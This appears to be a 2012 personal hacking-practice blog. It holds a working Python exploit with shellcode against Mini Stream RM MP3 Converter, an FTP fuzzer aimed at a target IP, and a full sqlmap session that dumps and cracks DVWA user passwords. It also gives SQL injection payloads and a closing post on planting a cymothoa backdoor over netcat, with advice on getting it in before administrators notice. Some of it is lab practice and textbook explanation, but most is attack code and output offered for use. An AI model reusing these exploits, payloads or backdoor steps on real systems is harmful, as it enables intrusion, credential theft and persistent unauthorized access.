Sunday, 12 February 2012

exploitation local exploit MP3 Converter

Now I try again to buffer overflow RM MP3. In this step, to check the buffer, I use 3 scripts to make the overflow: the first makes a string of 10000 characters, the second 20000 characters, the third 30000 characters. I will try them one by one to find out how many characters I need to overflow RM MP3.
In this job I use:
OllyDBG
Mini Stream RM MP3 Converter
an exploit made by myself
an overflow file made by myself
OK, let's begin trying to overflow. Starting with 10000 characters: no overflow :'(. Second try with 20000 characters: yupp,, overflow. Try again with 30000 characters: yupp,, overflow again, boom boom overflow.

Now I look for how many bytes it takes to reach EIP. I create a 20000-character pattern string to find out how many bytes are needed to reach EIP and ESP. Yupp, got it, boom, crash again :D. Now we take the values that landed in EIP and ESP:
EIP:
root@cupenk:/pentest/exploits/framework/tools# ./pattern_offset.rb 0x36695735 20000
17417
ESP:
root@cupenk:/pentest/exploits/framework/tools# ./pattern_offset.rb i8W 20000
17425
OK, next I make the program again, this time to find JMP ESP. First I will write the characters DADADADA into EIP. Yupp.. created..
#!/usr/bin/python
# writes an m3u file that should overwrite EIP with DADADADA if the 17417-byte offset is right
file="eip.m3u"
junk="http://"+"\x90" * 17417      # padding up to the saved return address (EIP)
junk+="\xDA\xDA\xDA\xDA"            # lands in EIP
file=open(file,'w')
file.write(junk)
print ("success idiot")
file.close()

Now I do the same for ESP: gotcha,, CACACACACA has landed at ESP :d
Now I look for a JMP ESP through shell32, yup, got it: JMP ESP at 7C9D30D7.
After checking, bingo, JMP ESP is confirmed. Now I create the exploit, using the payload from my earlier exploitation:
#!/usr/bin/python
file="exploit.m3u"
junk="http://"+"\x90" * 17417      # padding up to EIP (offset 17417)
junk+="\xD7\x30\x9D\x7C"            # JMP ESP at 0x7C9D30D7, written little-endian
junk+="\x90" * 32                   # NOP sled in front of the payload
junk+=("\x2b\xc9\xbe\x60\xbb\x9e\xe2\xda\xdf\xd9\x74\x24\xf4\x58\xb1\x51"
"\x83\xc0\x04\x31\x70\x0c\x03\x10\xb7\x7c\x17\x2c\xad\x6b\x95\x24"
"\xcb\x93\xd9\x4b\x4c\xe7\x4a\x97\xa9\x7c\xd7\xeb\x3a\xfe\xdd\x6b"
"\x3c\x10\x56\xc4\x26\x65\x36\xfa\x57\x92\x80\x71\x63\xef\x12\x6b"
"\xbd\x2f\x8d\xdf\x3a\x6f\xda\x18\x82\xba\x2e\x27\xc6\xd0\xc5\x1c"
"\x92\x02\x0e\x17\xff\xc0\x11\xf3\xfe\x3d\xcb\x70\x0c\x89\x9f\xd9"
"\x11\x0c\x4b\xe6\x05\x85\x02\x84\x71\x85\x75\x97\x4b\x6e\x11\x9c"
"\xef\xa0\x51\xe2\xe3\x4b\x15\xfe\x56\xc0\x96\xf6\xf6\xbf\x98\x48"
"\x09\xac\xf5\xab\xc3\x4a\xa5\x35\x84\xa1\x7b\xd1\x23\xb5\x49\x7e"
"\x98\xc6\x7e\xe8\xeb\xd4\x83\xd3\xbb\xd9\xaa\x7c\xb5\xc3\x35\x03"
"\x28\x03\xb8\x56\xd9\x16\x43\x88\x75\xce\xb2\xdd\x2b\xa7\x3b\xcb"
"\x67\x1b\x97\xa0\xd4\xd8\x44\x05\x88\x21\xba\xef\x46\xcf\x67\x89"
"\xc5\x66\x76\xc0\x82\xdc\x63\x9a\x95\x4a\x6b\x8c\x70\x65\xc2\x65"
"\x7a\x55\x8c\x21\x29\x78\xa4\x7e\xcd\x53\x65\xd5\xce\x8c\xe2\x30"
"\x79\xab\xba\xed\x85\x65\x6c\x45\x2e\xdf\x72\xb5\x5d\xb7\x6b\x4c"
"\xa4\x31\x23\x51\xfe\x97\x34\x7d\x99\x7d\xaf\x1b\x0e\xe1\x42\x6a"
"\x2b\x8f\xcc\x35\x9d\x9c\x64\x22\xb7\x58\xfe\x4e\x79\xa1\xf3\x24"
"\x84\x63\xd9\xc6\x3b\x48\xb2\xbb\xc6\xa8\x1f\x68\x9d\xa1\x2d\x90"
"\x51\x27\x2d\x19\xd2\xb7\x07\xba\x8d\x15\xf9\x6d\x63\xf0\xf8\xdc"
"\xd2\x51\xaa\x21\x04\x31\xe1\x04\xa0\x0c\xaa\x49\x7d\xfa\xb2\x4a"
"\xb5\x04\x9c\x3f\xed\x06\x9e\xfb\x76\x08\x77\x51\x88\x26\x10\xa5"
"\xfc\xc3\xbe\x16\xfe\x1a\xbf\x48")
file=open(file,'w')
file.write(junk)
print ("success idiot")
file.close()
Bingo, crash,, crash,, crash,, now I try to telnet to the victim:
gotcha,, let's dance dance dance hahaa,,, done done done, under attack.
Success...


buffer overflow RM MP3

Now I am learning buffer overflow again; this time I try to overflow RM MP3. To trigger the overflow I make a file with a Perl script:

my $file = "crash2.m3u";
my $junk = "\x41" x 30000;   # I change this count to find out how many characters are needed to overflow
open(my $FILE, '>', $file) or die "cannot open $file: $!";
print $FILE $junk;
close($FILE);
print "m3u File Created successfully\n";

Now I run this script to make the file crash2.m3u; the next step is to open the crash file in MP3 Converter.
When I open it in RM MP3 nothing crashes. I've failed, but no problem, I try to make the file with another script, based on the script from exploit-db:

my $Header = "#EXTM3U\n";
my $ex = "http://" . "A" x 26121;   # URL prefix followed by 26121 'A' bytes
open(MYFILE, '>>', 'asu.m3u') or die "cannot open asu.m3u: $!";
print MYFILE $Header . $ex;
close(MYFILE);

Then I run this Perl script and open the file in RM MP3, and tara tara,, boom,, crash. I don't know what happened with my earlier script, and I must find out.. RM MP3 overflows at 20000 and 30000.
Now I replace the A characters with a string made with pattern_create.
Now I try again to see what happens next.
I feel something is wrong in there, but I will try again, so keep moving on,,
Now, to create the exploit I must know where the data lands:
to reach EIP I need 17417 bytes, and to reach the stack (ESP) I need 17425.
Now I will write DADADADA into EIP,
so I write this syntax:

my $Header = "#EXTM3U\n";
my $ex  = "http://" . "\x90" x 17417;   # padding up to the saved EIP
my $ex1 = "\xDA\xDA\xDA\xDA";           # should land in EIP
open(MYFILE, '>>', 'b.m3u') or die "cannot open b.m3u: $!";
print MYFILE $Header . $ex . $ex1;
close(MYFILE);
Yeaaa,, EIP is overwritten with DADADADA, so I have EIP.
But how to write the length in Perl I don't know,, haha,, so I skip this step; to check that I really have EIP, I write the JMP ESP address into EIP.
Now I write the code again to exploit it on Windows. Oh no, I did something wrong, my payload can't work: I have a problem with the payload again.

file="fuck3.m3u"
junk="http://"+"\x90"* 17417
junk+="x\D7\x30\x9D\x7C"   # note: "x\D7" is not a valid hex escape (the intended bytes are "\xD7\x30\x9D\x7C"), so EIP does not receive 0x7C9D30D7 here
junk+="\x90" * 32
junk+=("\x2b\xc9\xbe\x60\xbb\x9e\xe2\xda\xdf\xd9\x74\x24\xf4\x58\xb1\x51"
"\x83\xc0\x04\x31\x70\x0c\x03\x10\xb7\x7c\x17\x2c\xad\x6b\x95\x24"
"\xcb\x93\xd9\x4b\x4c\xe7\x4a\x97\xa9\x7c\xd7\xeb\x3a\xfe\xdd\x6b"
"\x3c\x10\x56\xc4\x26\x65\x36\xfa\x57\x92\x80\x71\x63\xef\x12\x6b"
"\xbd\x2f\x8d\xdf\x3a\x6f\xda\x18\x82\xba\x2e\x27\xc6\xd0\xc5\x1c"
"\x92\x02\x0e\x17\xff\xc0\x11\xf3\xfe\x3d\xcb\x70\x0c\x89\x9f\xd9"
"\x11\x0c\x4b\xe6\x05\x85\x02\x84\x71\x85\x75\x97\x4b\x6e\x11\x9c"
"\xef\xa0\x51\xe2\xe3\x4b\x15\xfe\x56\xc0\x96\xf6\xf6\xbf\x98\x48"
"\x09\xac\xf5\xab\xc3\x4a\xa5\x35\x84\xa1\x7b\xd1\x23\xb5\x49\x7e"
"\x98\xc6\x7e\xe8\xeb\xd4\x83\xd3\xbb\xd9\xaa\x7c\xb5\xc3\x35\x03"
"\x28\x03\xb8\x56\xd9\x16\x43\x88\x75\xce\xb2\xdd\x2b\xa7\x3b\xcb"
"\x67\x1b\x97\xa0\xd4\xd8\x44\x05\x88\x21\xba\xef\x46\xcf\x67\x89"
"\xc5\x66\x76\xc0\x82\xdc\x63\x9a\x95\x4a\x6b\x8c\x70\x65\xc2\x65"
"\x7a\x55\x8c\x21\x29\x78\xa4\x7e\xcd\x53\x65\xd5\xce\x8c\xe2\x30"
"\x79\xab\xba\xed\x85\x65\x6c\x45\x2e\xdf\x72\xb5\x5d\xb7\x6b\x4c"
"\xa4\x31\x23\x51\xfe\x97\x34\x7d\x99\x7d\xaf\x1b\x0e\xe1\x42\x6a"
"\x2b\x8f\xcc\x35\x9d\x9c\x64\x22\xb7\x58\xfe\x4e\x79\xa1\xf3\x24"
"\x84\x63\xd9\xc6\x3b\x48\xb2\xbb\xc6\xa8\x1f\x68\x9d\xa1\x2d\x90"
"\x51\x27\x2d\x19\xd2\xb7\x07\xba\x8d\x15\xf9\x6d\x63\xf0\xf8\xdc"
"\xd2\x51\xaa\x21\x04\x31\xe1\x04\xa0\x0c\xaa\x49\x7d\xfa\xb2\x4a"
"\xb5\x04\x9c\x3f\xed\x06\x9e\xfb\x76\x08\x77\x51\x88\x26\x10\xa5"
"\xfc\xc3\xbe\x16\xfe\x1a\xbf\x48")
file=open(file,'w')
file.write(junk)
print("success")
file.close()

Friday, 10 February 2012

download

http://www.mediafire.com/?w77a06erasgs6nl

exploitation development > warftpd

In this next step I learn about buffer overflow; here I try to exploit Windows XP SP3 through a buffer overflow vulnerability. To learn this method I need the applications WarFTPD, Metasploit and OllyDBG. To find the vulnerability I need a fuzzer; I use a fuzzer written by mrp.bpp, he is my guru:

#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer="\x41"*1000                 # 1000 'A' bytes sent as the USER name
s.connect(('192.168.9.239',21))    # ip target
data=s.recv(1024)                  # read the FTP banner
print("sending evil data via USER command..")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
This program is set to the victim IP 192.168.9.239. Now I try to run it..
No.. I've failed: my WarFTPD can't run when I run it under OllyDBG. I hope I can solve this problem.

Thursday, 09 February 2012

buffer overflow

Buffer overflow vulnerabilities have been around since the early days of computers and still exist today. Most Internet worms use buffer overflow vulnerabilities to propagate, and even the most recent zero-day VML vulnerability in Internet Explorer is due to a buffer overflow.

C is a high-level programming language, but it assumes that the programmer is responsible for data integrity. If this responsibility were shifted over to the compiler, the resulting binaries would be significantly slower, due to integrity checks on every variable. Also, this would remove a significant level of control from the programmer and complicate the language.

While C's simplicity increases the programmer's control and the efficiency of the resulting programs, it can also result in programs that are vulnerable to buffer overflows and memory leaks if the programmer isn't careful. This means that once a variable is allocated memory, there are no built-in safeguards to ensure that the contents of a variable fit into the allocated memory space. If a programmer wants to put ten bytes of data into a buffer that had only been allocated eight bytes of space, that type of action is allowed, even though it will most likely cause the program to crash. This is known as a buffer overrun or buffer overflow, since the extra two bytes of data will overflow and spill out of the allocated memory, overwriting whatever happens to come next. If a critical piece of data is overwritten, the program will crash. The overflow_example.c code offers an example:

int main(int argc, char *argv[]) {
   int value = 5;
   char buffer_one[8], buffer_two[8]; 
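Added here as an illustration of the paragraph above (it is not code from the page or from the book it cites): the same 8-byte buffers and integer from overflow_example.c, placed in a struct so the spill-over is deterministic, with the unbounded copy next to a length-checked one.

```c
/* Added example, not from the page or the cited book. The struct mirrors
 * the locals of overflow_example.c: bytes written past buffer_two[7] land
 * in buffer_one, then in value. A struct is used so the layout is fixed
 * instead of depending on how the compiler orders real stack locals. */
#include <stdio.h>
#include <string.h>

struct frame {
    char buffer_two[8];   /* the buffer the input is copied into          */
    char buffer_one[8];   /* "whatever happens to come next": first 8 bytes */
    int  value;           /* ...and after that, the critical integer      */
};

/* Constructed starting state: "two", "one" and 5, as in the book's example. */
static void init_frame(struct frame *f)
{
    memset(f, 0, sizeof *f);
    strcpy(f->buffer_two, "two");   /* 3 chars + NUL: fits in 8 bytes */
    strcpy(f->buffer_one, "one");
    f->value = 5;
}

/* Vulnerable: copies until the NUL terminator, however long the input is.
 * Same mistake as strcpy(buffer_two, argv[1]). The loop is written by hand
 * so the demo does not depend on a fortified libc strcpy aborting first.
 * Returns the number of bytes written (more than 8 means neighbours were hit). */
static size_t unsafe_copy(struct frame *f, const char *input)
{
    char *dst = f->buffer_two;
    size_t n = 0;
    do {
        dst[n] = input[n];
    } while (input[n++] != '\0');
    return n;
}

/* Hardened: checks that the input plus its NUL fits before writing anything.
 * Returns 0 on success, -1 (frame untouched) if the input is too long. */
static int safe_copy(struct frame *f, const char *input)
{
    size_t len = strlen(input);
    if (len >= sizeof f->buffer_two)
        return -1;
    memcpy(f->buffer_two, input, len + 1);
    return 0;
}

/* Did copying `input` with the vulnerable routine disturb buffer_one? */
static int clobbers_buffer_one(const char *input)
{
    struct frame f;
    init_frame(&f);
    unsafe_copy(&f, input);
    return strcmp(f.buffer_one, "one") != 0;
}

/* Did it reach all the way into `value`? */
static int clobbers_value(const char *input)
{
    struct frame f;
    init_frame(&f);
    unsafe_copy(&f, input);
    return f.value != 5;
}

int main(void)
{
    /* Constructed inputs: ten bytes (the case described in the text) and
     * seventeen bytes, which run through both buffers into the integer. */
    const char *ten = "AAAAAAAAAA";
    const char *seventeen = "AAAAAAAAAAAAAAAAB";
    struct frame f;

    init_frame(&f);
    printf("[BEFORE] buffer_two='%s' buffer_one='%s' value=%d\n",
           f.buffer_two, f.buffer_one, f.value);
    unsafe_copy(&f, ten);
    printf("[UNSAFE, 10 bytes] buffer_one='%s' value=%d\n", f.buffer_one, f.value);

    init_frame(&f);
    unsafe_copy(&f, seventeen);
    printf("[UNSAFE, 17 bytes] value=0x%08x (was 5)\n", (unsigned)f.value);

    init_frame(&f);
    printf("[SAFE] rc=%d buffer_one='%s' value=%d\n",
           safe_copy(&f, ten), f.buffer_one, f.value);
    return 0;
}
```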

reference: The Art of Exploitation, 2nd edition

Dumping Database

If we attack a system through a SQL injection vulnerability, we must know where the vulnerability is found; for that we need an application which checks for MySQL injection vulnerabilities. I use 2 applications: sqlmap and Burp Suite. Let's begin the attack. In my article I use a simulation with DVWA; in this simulation I am the user who searches the database and then dumps it. OK, now let's begin: I run Burp Suite and open the DVWA website in my browser with the proxy on port 8080.
I get "GET /dvwa/vulnerabilities/sqli/?id=%27or+1%3D1%23&Submit=Submit" and "Cookie: security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0".
Now I test it using sqlmap:
root@cupenk:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0"

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 20:15:52

[20:15:52] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[20:15:52] [INFO] testing connection to the target url
[20:15:52] [INFO] testing if the url is stable, wait a few seconds
[20:15:53] [INFO] url is stable
[20:15:53] [INFO] testing if GET parameter 'id' is dynamic
[20:15:53] [WARNING] GET parameter 'id' appears to be not dynamic
[20:15:53] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[20:15:53] [INFO] testing sql injection on GET parameter 'id'
[20:15:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:15:53] [INFO] heuristics detected web page charset 'ascii'
[20:15:53] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[20:15:53] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[20:15:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:15:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[20:16:04] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[20:16:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:16:04] [INFO] target url appears to be UNION injectable with 2 columns
[20:16:04] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
[20:16:06] [INFO] testing if GET parameter 'Submit' is dynamic
[20:16:06] [WARNING] GET parameter 'Submit' appears to be not dynamic
[20:16:06] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[20:16:06] [INFO] testing sql injection on GET parameter 'Submit'
[20:16:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:16:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[20:16:07] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:16:07] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[20:16:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:16:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:16:11] [WARNING] GET parameter 'Submit' is not injectable
sqlmap identified the following injection points with a total of 136 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 233 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,111,104,58),(SELECT (CASE WHEN (233=233) THEN 1 ELSE 0 END)),CHAR(58,106,108,120,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eSbn'='eSbn&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,120,111,104,58),IFNULL(CAST(CHAR(83,118,69,106,87,85,98,113,65,66) AS CHAR),CHAR(32)),CHAR(58,106,108,120,58))# AND 'dMOG'='dMOG&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'Nhlt'='Nhlt&Submit=Submit
---

[20:16:11] [INFO] manual usage of GET payloads requires url encoding
[20:16:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[20:16:11] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 20:16:11

Now I check the databases:
root@cupenk:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0" --dbs

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 20:16:35

[20:16:35] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[20:16:35] [INFO] resuming injection data from session file
[20:16:35] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[20:16:35] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 233 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,111,104,58),(SELECT (CASE WHEN (233=233) THEN 1 ELSE 0 END)),CHAR(58,106,108,120,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eSbn'='eSbn&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,120,111,104,58),IFNULL(CAST(CHAR(83,118,69,106,87,85,98,113,65,66) AS CHAR),CHAR(32)),CHAR(58,106,108,120,58))# AND 'dMOG'='dMOG&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'Nhlt'='Nhlt&Submit=Submit
---

[20:16:35] [INFO] manual usage of GET payloads requires url encoding
[20:16:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[20:16:35] [INFO] fetching database names
available databases [3]:
[*] dvwa
[*] information_schema
[*] mysql

[20:16:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 20:16:35

I got the database; now how can I dump it?
sqlmap.py: error: no such option: --D
root@cupenk:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0" -D dvwa --tables

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 20:20:59

[20:20:59] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[20:20:59] [INFO] resuming injection data from session file
[20:20:59] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[20:20:59] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 233 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,111,104,58),(SELECT (CASE WHEN (233=233) THEN 1 ELSE 0 END)),CHAR(58,106,108,120,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eSbn'='eSbn&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,120,111,104,58),IFNULL(CAST(CHAR(83,118,69,106,87,85,98,113,65,66) AS CHAR),CHAR(32)),CHAR(58,106,108,120,58))# AND 'dMOG'='dMOG&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'Nhlt'='Nhlt&Submit=Submit
---

[20:20:59] [INFO] manual usage of GET payloads requires url encoding
[20:20:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[20:20:59] [INFO] fetching tables for database: dvwa
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[20:20:59] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 20:20:59

Target: dump the "users" table
root@cupenk:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0" -T users --dump

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 20:38:37

[20:38:37] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[20:38:37] [INFO] resuming injection data from session file
[20:38:37] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[20:38:37] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 233 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,111,104,58),(SELECT (CASE WHEN (233=233) THEN 1 ELSE 0 END)),CHAR(58,106,108,120,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eSbn'='eSbn&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,120,111,104,58),IFNULL(CAST(CHAR(83,118,69,106,87,85,98,113,65,66) AS CHAR),CHAR(32)),CHAR(58,106,108,120,58))# AND 'dMOG'='dMOG&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'Nhlt'='Nhlt&Submit=Submit
---

[20:38:37] [INFO] manual usage of GET payloads requires url encoding
[20:38:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[20:38:37] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) entries
[20:38:37] [INFO] fetching current database
[20:38:37] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': dvwa
[20:38:37] [INFO] fetching columns for table 'users' on database 'dvwa'
[20:38:37] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': user_id, int(6), first_name, varchar(15), last_name, varchar(15), user, varchar(15), password, varchar(32), avatar, varchar(70)
[20:38:38] [INFO] fetching entries for table 'users' on database 'dvwa'
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[20:38:40] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[20:38:42] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[20:38:44] [INFO] starting dictionary attack (md5_generic_passwd)
[20:38:44] [INFO] found: 'abc123' for user: 'gordonb'                         
[20:38:45] [INFO] found: 'charley' for user: '1337'                           
[20:38:45] [INFO] found: 'letmein' for user: 'pablo'                          
[20:38:46] [INFO] found: 'password' for user: 'admin'                         
[20:39:09] [INFO] 4159708/10006596 words (42%)
Database: dvwa                                                                
Table: users
[5 entries]
+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+
| avatar                                           | first_name | last_name | password                                    | user    | user_id |
+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+
| http://127.0.0.1/dvwa/hackable/users/pablo.jpg   | Pablo      | Picasso   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | pablo   | 4       |
| http://127.0.0.1/dvwa/hackable/users/gordonb.jpg | Gordon     | Brown     | e99a18c428cb38d5f260853678922e03 (abc123)   | gordonb | 2       |
| http://127.0.0.1/dvwa/hackable/users/admin.jpg   | admin      | admin     | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin   | 1       |
| http://127.0.0.1/dvwa/hackable/users/smithy.jpg  | Bob        | Smith     | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | smithy  | 5       |
| http://127.0.0.1/dvwa/hackable/users/1337.jpg    | Hack       | Me        | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | 1337    | 3       |
+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+

[20:39:42] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[20:39:42] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 20:39:42

Wednesday, 08 February 2012

SQL Injection & Blind SQL Injection

A SQL injection attack consists of insertion or injection of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

This form of SQL injection occurs when user input is not filtered for escape characters and is then passed into an SQL statement. This results in the potential manipulation of the statements performed on the database by the end-user of the application.

The following line of code illustrates this vulnerability:
statement = "SELECT * FROM users WHERE name = '" + userName + "';"

This SQL code is designed to pull up the records of the specified username from its table of users. However, if the "userName" variable is crafted in a specific way by a malicious user, the SQL statement may do more than the code author intended. For example, setting the "userName" variable as
' or '1'='1
Or using comments to even block the rest of the query (there are three types of SQL comments):
' or '1'='1' -- '
' or '1'='1' ({ '
' or '1'='1' /* '

Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established.

reference: http://en.wikipedia.org/wiki/SQL_injection

Monday, 06 February 2012

backdooring with nc and cymothoa

In this article I try to explain backdooring with nc and cymothoa. This step is done in a hacking technique after we have finished attacking a system. Installing the backdoor on the victim should not take more than 5 minutes after the attack is done; if it takes longer you will fail, because the system administrator will know what you are doing.
You can install the cymothoa backdoor using nc. Run this command on the victim system:
#nc -l -p 212 > cymothoa
When that is done, run nc on your system too, to transfer cymothoa:
root@cupenk:/pentest/backdoors/cymothoa# nc 192.168.0.135 212 < cymothoa
